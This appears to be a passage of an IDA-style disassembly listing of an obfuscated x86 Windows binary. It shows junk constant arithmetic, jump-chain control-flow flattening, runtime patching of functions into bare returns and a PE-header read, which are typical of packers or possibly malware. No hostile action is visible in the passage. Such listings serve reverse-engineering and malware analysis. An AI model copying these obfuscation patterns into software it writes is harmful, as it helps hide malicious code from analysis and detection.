; END OF FUNCTION CHUNK	FOR sub_44D302

; =============== S U B	R O U T	I N E =======================================



sub_452E72	proc near		; CODE XREF: sub_44D6A5-165Cj

; FUNCTION CHUNK AT 0044F3A3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AF5F SIZE 00000010 BYTES

		push	ebp
		popf
		jns	loc_44F3A3
sub_452E72	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_452E7A:				; CODE XREF: sub_44D6A5:loc_44C03Dj
		rol	edx, 3
		or	edx, 0D1F66437h
		jmp	loc_45B56A
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------

loc_452E88:				; CODE XREF: y2kk37jd:0044613Aj
		rol	eax, 7
		xor	eax, 2A5F14D3h
		rol	eax, 0Ch
		push	esi
		jmp	loc_4465EF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_282. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_452E9B:				; CODE XREF: sub_44A6B5-1ADj
		jmp	nullsub_518
; END OF FUNCTION CHUNK	FOR sub_44A6B5

; =============== S U B	R O U T	I N E =======================================



sub_452EA0	proc near		; CODE XREF: y2kk37jd:00458192j
					; sub_45A8E1+Dp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004432BD SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	esi, 0D86D04FBh
		popf
		xchg	esi, [esp-8+arg_4]
		jmp	loc_4432BD
sub_452EA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_452EB3:				; CODE XREF: sub_4421DC:loc_43BF4Fj
		push	0CA001DA2h
		pop	ecx
		and	ecx, 22AA9B16h
		rol	ecx, 0Ch
		jmp	loc_455A00
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452EC7:				; CODE XREF: sub_445226+3Dj
		push	0EE90DEF9h
		jz	loc_44D57C
		xchg	esi, edi
		mov	[edx], ecx
		jmp	loc_443014
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	eax, 0DA4431C0h
		call	sub_442C3E
		push	edi
		push	45376E49h
		pop	edi
		or	edi, 0E77B6359h
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_452EF2:				; CODE XREF: sub_43E679+12F65j
		add	edi, 538B83AAh
		jmp	loc_44B8B0
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44B65D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_452F03:				; CODE XREF: sub_445C40:loc_441528j
		push	offset loc_43E1CD
		jmp	nullsub_132
; END OF FUNCTION CHUNK	FOR sub_445C40
; ---------------------------------------------------------------------------
		and	esi, eax
		jmp	sub_450216
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589B7

loc_452F14:				; CODE XREF: sub_4589B7:loc_445B17j
		call	sub_459F8F
		mov	eax, 4C5D3995h
		call	sub_442C3E
		mov	ds:dword_41E148, eax
		jmp	loc_43F13E
; END OF FUNCTION CHUNK	FOR sub_4589B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_308. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_452F2F:				; CODE XREF: sub_4552EB:loc_43CDEBj
		jz	loc_45AF55
		jmp	loc_44A348
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_452F3A:				; CODE XREF: sub_45B41E-907j
					; y2kk37jd:0045AB27j
		add	eax, 0A10215B7h
		and	eax, 386BBE02h
		sub	eax, 8F71402Eh
		add	eax, 57AAD8A4h
		xchg	eax, [esp+4+var_4]
		jmp	loc_452281
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_452F5A:				; CODE XREF: sub_4411C3:loc_44782Dj
		add	eax, 0EBED983Dh
		xchg	eax, [esp+0]
		jmp	loc_453449
; END OF FUNCTION CHUNK	FOR sub_4411C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E707

loc_452F69:				; CODE XREF: sub_43E707+11A7Aj
		jmp	nullsub_133
; END OF FUNCTION CHUNK	FOR sub_43E707
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_452F6E:				; CODE XREF: sub_4458DD+72FAj
		pop	eax

loc_452F6F:				; CODE XREF: sub_4448E2+B8CFj
					; sub_4448E2:loc_459BFDj ...
		jmp	loc_457DAE
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_452F74:				; CODE XREF: sub_44610D-7777j
					; sub_4448E2+14924j
		xchg	esi, [esp+0]
		mov	ecx, esi
		jmp	loc_44CDC4
; END OF FUNCTION CHUNK	FOR sub_44610D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_452F7F:				; CODE XREF: y2kk37jd:00453CC8j
		jmp	sub_442C3E
; ---------------------------------------------------------------------------

loc_452F84:				; CODE XREF: y2kk37jd:00444D41j
		jmp	loc_44C232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_452F89:				; CODE XREF: sub_44E840+Dj
					; y2kk37jd:00452E2Cj
		add	ebx, 0DDBB7EB8h
		mov	[ebx], edx
		push	offset sub_452CFB
		jmp	nullsub_141
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB99

loc_452F9B:				; CODE XREF: sub_45BB99+10j
		rol	edx, 5
		xor	edx, esi
		rol	edx, 5
		add	edx, edi
		rol	edx, 5
		push	offset sub_455556
		jmp	loc_44D64A
; END OF FUNCTION CHUNK	FOR sub_45BB99
; ---------------------------------------------------------------------------

loc_452FB2:				; DATA XREF: sub_43D412+1E63Co
		push	edx
		push	eax
		push	167FB903h
		pop	eax
		rol	eax, 8
		xor	eax, 0EF7600C8h
		jmp	loc_444227
; ---------------------------------------------------------------------------

loc_452FC8:				; DATA XREF: sub_445226+F4ACo
		push	10h
		mov	eax, [ebp+8]
		push	ebp
		shr	ebp, 3
		jmp	loc_45908C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_452FD6:				; CODE XREF: sub_44B55D+9BB1j
		add	eax, 830FBC0Fh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43F5B0
		jmp	loc_43D032
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_452FEC:				; CODE XREF: sub_445787+3738j
		jg	loc_45BDDC
		sub	ebp, ecx
		jmp	loc_459009
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508FD

loc_452FF9:				; CODE XREF: sub_4508FD:loc_4527DAj
		pop	ebx
		rol	ebx, 0Fh
		sub	ebx, 1D430850h
		add	ebx, 0BECEA1DEh
		jmp	loc_447709
; END OF FUNCTION CHUNK	FOR sub_4508FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_45300E:				; CODE XREF: sub_4564EB+244Fj
		xchg	eax, [esp+0]
		push	ebx
		push	842332Bh
		pop	ebx
		and	ebx, ds:4000E8h
		add	ebx, 2CA7B4E6h
		rol	ebx, 1Eh
		jmp	loc_43C40A
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45302C:				; CODE XREF: sub_453867:loc_459AA5j
		xchg	edi, [esp+4+var_4]
		mov	eax, 63D271B9h
		jmp	loc_443F80
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_453039:				; CODE XREF: sub_4514DE+3577j
		jnb	loc_448AAD
		mov	edx, ecx
		mov	esi, [edx]
		jmp	loc_45A108
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4441FF

loc_453048:				; CODE XREF: sub_4441FF+1Cj
		and	edi, 2917C1E6h
		add	edi, 0D72DD4F2h
		mov	[edi], eax
		pop	edi
		call	sub_44EE3D
		mov	ds:dword_444AE0, eax
		jmp	loc_45C18A
; END OF FUNCTION CHUNK	FOR sub_4441FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_453066:				; CODE XREF: sub_44AC89+BD67j
		add	eax, 54h
		mov	eax, [eax]
		or	eax, eax
		jz	loc_44457F
		jmp	loc_43CAC8
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		sbb	eax, 1FB78048h
		jmp	loc_445E1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_453083:				; CODE XREF: sub_454413+4611j
		ror	ebp, 15h
		cdq
		not	ebx
		xchg	edx, [ebx]

loc_45308B:				; CODE XREF: sub_454413:loc_4451CAj
		mov	[ebp-18h], eax
		jmp	loc_453715
; END OF FUNCTION CHUNK	FOR sub_454413

; =============== S U B	R O U T	I N E =======================================



sub_453093	proc near		; CODE XREF: sub_44CE06+10j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443CCA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444B0F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453142 SIZE 00000011 BYTES

		push	ebx

loc_453094:				; CODE XREF: y2kk37jd:loc_45417Fj
		push	0A562CC9Fh
		pop	ebx
		and	ebx, 7098738h
		jmp	loc_443CCA
sub_453093	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_4530A5:				; CODE XREF: sub_458DD9-42EDj
		sbb	edx, esi

loc_4530A7:				; CODE XREF: sub_458DD9:loc_43DBA3j
		push	eax
		lea	eax, dword_44C240
		push	edi
		jmp	loc_44D2EC
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_4530B4:				; CODE XREF: sub_44606C-5001j
		mov	edx, esi
		pop	esi
		call	sub_43B2EB
; END OF FUNCTION CHUNK	FOR sub_44606C
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4530BC:				; CODE XREF: sub_45B7AA-10BB7j
		jmp	loc_44BD55
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443695

loc_4530C1:				; CODE XREF: sub_443695:loc_44369Fj
		rol	edx, 1Ah
		xor	edx, 0AD3EC50h
		add	edx, 0E5466D28h
		xchg	edx, [esp+0]
		jmp	loc_4504F6
; END OF FUNCTION CHUNK	FOR sub_443695

; =============== S U B	R O U T	I N E =======================================



sub_4530D8	proc near		; DATA XREF: sub_43D8D9+13o

; FUNCTION CHUNK AT 0045A9B1 SIZE 00000006 BYTES

		push	edx
		push	9548F600h
		pop	edx
		or	edx, 0D648B502h
		sub	edx, 195AA37Ah
		and	edx, 225FA51Fh
		add	edx, 0DFF3E010h
		mov	[edx], eax
		jmp	loc_45A9B1
sub_4530D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_4530FE:				; CODE XREF: sub_4553C1:loc_44F6A0j
		push	9F8D8D40h
		pop	esi
		and	esi, 3D4DA878h
; END OF FUNCTION CHUNK	FOR sub_4553C1
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_45310A:				; CODE XREF: sub_43BD0D:loc_44B40Fj
		or	esi, 284FB53Ch
		xor	esi, 0A22E52C5h
		add	esi, 60E31BEBh
		jmp	loc_43B01E
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		jnz	loc_4409C7
		jmp	loc_440E4F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45312D:				; CODE XREF: y2kk37jd:00458AA8j
		jmp	loc_44869D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DB8

loc_453132:				; CODE XREF: sub_443DB8-51C4j
		jmp	loc_45C3C7
; END OF FUNCTION CHUNK	FOR sub_443DB8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_453137:				; CODE XREF: sub_4507BF-62ECj
		sub	ebx, 116ADA96h
		jmp	loc_45172E
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453093

loc_453142:				; CODE XREF: sub_453093-E56Fj
		ror	edi, 7

loc_453145:				; CODE XREF: sub_453093:loc_444B0Fj
		add	eax, 283C39ABh
		xchg	eax, [esp+4+var_4]
		jmp	sub_4513DB
; END OF FUNCTION CHUNK	FOR sub_453093

; =============== S U B	R O U T	I N E =======================================



sub_453153	proc near		; DATA XREF: y2kk37jd:00456171o

; FUNCTION CHUNK AT 00451812 SIZE 0000000B BYTES

		mov	ecx, [ecx]
		and	ecx, 7
		call	sub_440A37

loc_45315D:				; CODE XREF: y2kk37jd:0045565Bj
		jmp	loc_451812
sub_453153	endp

; ---------------------------------------------------------------------------

loc_453162:				; CODE XREF: y2kk37jd:0044883Bj
		jmp	loc_45721B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_453167:				; CODE XREF: sub_43C054+A06Cj
		push	0EBD0B85Fh
		sub	ebp, 586E3517h
		jmp	loc_44D3AC
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_453177:				; CODE XREF: sub_4458DD:loc_444227j
		add	eax, 6F7525E4h
		xchg	eax, [esp-8+arg_4]
		jmp	sub_454D0F
; END OF FUNCTION CHUNK	FOR sub_4458DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_453186:				; CODE XREF: sub_448700+1245Bj
		jmp	loc_43E79A
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_45318B:				; CODE XREF: sub_44C304:loc_43DE86j
		jge	loc_43CD36

loc_453191:				; CODE XREF: sub_454251-C616j
		jmp	loc_4496E8
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4456D8

loc_453196:				; CODE XREF: sub_4456D8-91D7j
		jmp	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_4456D8
; ---------------------------------------------------------------------------
		mov	ebx, [esi]
		jmp	loc_43CD2B

; =============== S U B	R O U T	I N E =======================================



sub_4531A2	proc near		; CODE XREF: y2kk37jd:0043D23Aj
					; sub_450F34+1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044CE22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6F0 SIZE 00000015 BYTES

		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		push	0DBA47DA9h
		xchg	eax, [esp-4+arg_0]
		mov	edi, eax
		jmp	loc_44CE22
sub_4531A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4531B5:				; CODE XREF: y2kk37jd:00455BA8j
		jbe	loc_43B4BA
		cmp	ecx, 0F389A846h
		jmp	loc_45224B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4531C6:				; CODE XREF: sub_4458DD-12CDj
		jnz	loc_4531F7

loc_4531CC:				; CODE XREF: y2kk37jd:0045756Bj
		jmp	loc_44B5AD
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4531D1:				; CODE XREF: sub_454413+Aj
		jmp	loc_44B761
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------

loc_4531D6:				; CODE XREF: y2kk37jd:00441E75j
		jmp	nullsub_202
; ---------------------------------------------------------------------------
		add	edi, 5222A1A3h
		jno	loc_447199
		jmp	loc_4531F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_4531EC:				; CODE XREF: sub_4552EB:loc_452C73j
		cmp	eax, 0D9E0ACEEh
		jmp	loc_443CCF
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4531F7:				; CODE XREF: sub_4458DD:loc_4531C6j
					; y2kk37jd:004531E7j
		xor	ebx, 0F468FD5Fh
		add	eax, ebx
		pop	ebx
		rol	eax, 0Eh
		jmp	loc_44CB00
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_453208:				; CODE XREF: sub_4448E2+17663j
		jz	loc_443C20
		jmp	loc_458B60
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		shr	edi, 16h
		jmp	loc_440DBB
; ---------------------------------------------------------------------------

loc_45321B:				; CODE XREF: y2kk37jd:00457E14j
		mov	edx, ecx
		pop	ecx

loc_45321E:				; CODE XREF: y2kk37jd:loc_44EC74j
		mov	eax, [esp]

loc_453221:				; CODE XREF: y2kk37jd:0043D293j
		push	edx
		call	sub_455BE9
		call	sub_44ECA8
; START	OF FUNCTION CHUNK FOR sub_43C4A9

loc_45322C:				; CODE XREF: sub_43C4A9+Fj
		jmp	loc_448097
; END OF FUNCTION CHUNK	FOR sub_43C4A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_453231:				; CODE XREF: sub_44610D-45CAj
		sbb	esi, 8891CB86h
		xchg	edi, esi
		pushf
		cmp	ebp, ecx
		jmp	loc_443326
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
		mov	ecx, ebx
		jmp	sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_453248:				; CODE XREF: sub_4411C3+11611j
		sbb	ecx, 7D93CB51h
		cmp	esi, 48B17175h
		jmp	loc_4579DC
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_453259:				; CODE XREF: sub_44F086:loc_449FD5j
		xchg	esi, [esp+0]
		push	0CB2951C3h
		xchg	ebx, [esp+4+var_4]
		mov	edx, ebx
		pop	ebx
		add	edx, 42472A15h

loc_45326D:				; CODE XREF: y2kk37jd:loc_451415j
		jmp	loc_43B93E
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456136

loc_453272:				; CODE XREF: sub_456136:loc_43B322j
					; sub_456136-1125Fj
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		push	ecx
		push	4A040AAAh
		pop	ecx
		jmp	loc_440014
; END OF FUNCTION CHUNK	FOR sub_456136
; ---------------------------------------------------------------------------
		test	eax, eax

loc_45328B:				; CODE XREF: y2kk37jd:loc_45AC28j
		jnz	loc_454754
		jmp	loc_44764E
; ---------------------------------------------------------------------------

loc_453296:				; CODE XREF: y2kk37jd:loc_4532EFj
		or	edi, 0F7755F53h
		xor	edi, 891D1295h
		call	loc_43B27E
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4532A7:				; CODE XREF: sub_4458DD+9945j
		jmp	loc_44C9C1
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		mov	ds:off_41E0A4, eax
		lea	eax, sub_44FB21
		mov	byte ptr [eax],	0C3h
		jmp	loc_43E62D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_4532C0:				; CODE XREF: sub_44FB21j
		xchg	esi, [esp+0]
		jmp	loc_43C769
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455958

loc_4532C8:				; CODE XREF: sub_455958:loc_43C3D6j
		xchg	ebp, [esp+0]
		nop
		mov	eax, 2867838Ah
		push	ecx
		push	0D2F4D285h
		pop	ecx
		or	ecx, 0C2484E11h
		cmp	ecx, 5DA16587h
		jmp	loc_4529B2
; END OF FUNCTION CHUNK	FOR sub_455958
; ---------------------------------------------------------------------------

locret_4532E9:				; CODE XREF: y2kk37jd:loc_43C3DBj
		retn
; ---------------------------------------------------------------------------

loc_4532EA:				; CODE XREF: y2kk37jd:00455027j
		jmp	locret_45210E
; ---------------------------------------------------------------------------

loc_4532EF:				; CODE XREF: y2kk37jd:004409BAj
		jmp	loc_453296

; =============== S U B	R O U T	I N E =======================================



sub_4532F4	proc near		; CODE XREF: y2kk37jd:00447953j
					; sub_44DE80+9p

; FUNCTION CHUNK AT 004406D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044177C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452CA3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00456C51 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		test	byte ptr [eax-7], 10h
		jz	loc_452CA3
		push	offset loc_4406D3
		jmp	loc_456C51
sub_4532F4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_453315	proc near		; CODE XREF: y2kk37jd:0044015Dj
					; sub_454DDC+3p

; FUNCTION CHUNK AT 004547B2 SIZE 0000000F BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	esi
		mov	esi, ecx
		jmp	loc_4547B2
sub_453315	endp

; ---------------------------------------------------------------------------
		test	edi, 51759631h
		jmp	loc_45688A
; ---------------------------------------------------------------------------
		mov	ds:dword_41E120, eax
		lea	eax, nullsub_500
		mov	byte ptr [eax],	0C3h
		jmp	loc_441892
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_4599BE
		push	offset sub_4586AD
		jmp	loc_4576CF
; ---------------------------------------------------------------------------

loc_453354:				; DATA XREF: sub_44B2F0+F84Fo
		rol	eax, 10h
		sub	eax, 870A3077h
		rol	eax, 14h
		xor	eax, 84624290h
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_453366:				; CODE XREF: sub_4448E2:loc_456E67j
		push	ecx
		push	69A89B48h

loc_45336C:				; CODE XREF: sub_43ED19:loc_4564CFj
		pop	ecx
		jmp	loc_44786E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAAA

loc_453372:				; CODE XREF: sub_45AAAA:loc_44DE94j
		js	loc_4544D8
		shr	eax, 0Bh
		adc	ebp, 0FA6DF2B6h
		jmp	loc_443F3F
; END OF FUNCTION CHUNK	FOR sub_45AAAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_453386:				; CODE XREF: sub_43BD3D+1AB0Dj
		pop	edx
		xor	edx, 0DF1F6B97h
		sub	edx, 0A0ADF6D0h
		xor	edx, 8167D2EFh
		test	edx, 800h
		jmp	loc_44FB12
; END OF FUNCTION CHUNK	FOR sub_43BD3D

; =============== S U B	R O U T	I N E =======================================



sub_4533A4	proc near		; DATA XREF: y2kk37jd:00451D79o
		push	0FFFA1D02h
		pop	ecx
		xor	ecx, 56577E87h
		add	ecx, 5697BA43h
		xchg	ecx, [esp+0]
		jmp	sub_448C11
sub_4533A4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4533BE:				; CODE XREF: sub_4507BF:loc_445A16j
		jz	loc_447280
		jmp	loc_43B2A0
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_4533C9:				; CODE XREF: y2kk37jd:0045739Fj
		jns	nullsub_97
		and	ebx, eax
		jmp	loc_43B540
; ---------------------------------------------------------------------------

loc_4533D6:				; CODE XREF: y2kk37jd:0045C43Cj
		add	eax, 0D49280Ch
		cmp	eax, 881179A7h
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4533E2:				; CODE XREF: sub_457D5A-1A1D7j
		jmp	loc_4546B0
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4533E7:				; CODE XREF: sub_43B765+E2Dj
					; sub_45B7AA-18DA0j ...
		call	sub_45447D

loc_4533EC:				; CODE XREF: sub_448CAE+13689j
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A45E

loc_4533F1:				; CODE XREF: sub_45A45E+Ej
		jmp	loc_44A036
; END OF FUNCTION CHUNK	FOR sub_45A45E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D5ED

loc_4533F6:				; CODE XREF: sub_44D5ED+Aj
		jmp	loc_454021
; END OF FUNCTION CHUNK	FOR sub_44D5ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_4533FB:				; CODE XREF: sub_43F8B8+9j
		jmp	loc_44CE60
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_453400:				; CODE XREF: sub_445226+4FE7j
		or	eax, 0F6BF201Dh
		and	eax, 8618FD8Dh
		add	eax, 0D1C58B22h
		add	eax, ebp
		add	eax, 0A8217BCDh
		mov	eax, [eax]
		jmp	loc_44E668
; ---------------------------------------------------------------------------

loc_453421:				; CODE XREF: sub_445226:loc_45842Bj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44FA3A
		jmp	loc_44ED54
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_525. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_453431:				; CODE XREF: y2kk37jd:00446B90j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_453432:				; CODE XREF: sub_445226+B10j
		jmp	loc_43E97A
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543EF

loc_453437:				; CODE XREF: sub_4543EF-12DFBj
		jmp	loc_43C537
; END OF FUNCTION CHUNK	FOR sub_4543EF
; ---------------------------------------------------------------------------

loc_45343C:				; CODE XREF: y2kk37jd:loc_45B9E4j
		xchg	ebp, [esp]
		ror	eax, 18h
		mov	ds:dword_446618, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_453449:				; CODE XREF: sub_4411C3+11DA0j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_45344E:				; CODE XREF: sub_43B4EE+3775j
		rol	eax, 18h

loc_453451:				; CODE XREF: y2kk37jd:004435E4j
		push	edi
		mov	edi, esi
		jmp	loc_45AF32
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_453459:				; CODE XREF: sub_446E19+DF0j
		jnz	loc_43D19C
		jmp	loc_4500C3
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
		mov	edx, ebp
		jmp	loc_43F675
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_45346B:				; CODE XREF: sub_45B7AA+CAj
		jz	loc_448EE0
		jmp	loc_43F3F3
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C224

loc_453476:				; CODE XREF: sub_44C224:loc_44C22Dj
		call	sub_44F3F5
		mov	eax, 99B20D50h
		push	eax
		push	66BB2469h
		adc	eax, 0A9796E7Fh
		jmp	loc_448F8C
; END OF FUNCTION CHUNK	FOR sub_44C224
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_453491:				; CODE XREF: sub_44610D+131A0j
		sub	edx, 18481F1h
		cmp	ecx, ebx
		jmp	loc_456783
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_45349E	proc near		; CODE XREF: y2kk37jd:0043FFC6j
					; sub_45651A:loc_45AA2Cp
		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		add	esp, 0FFFFFFECh
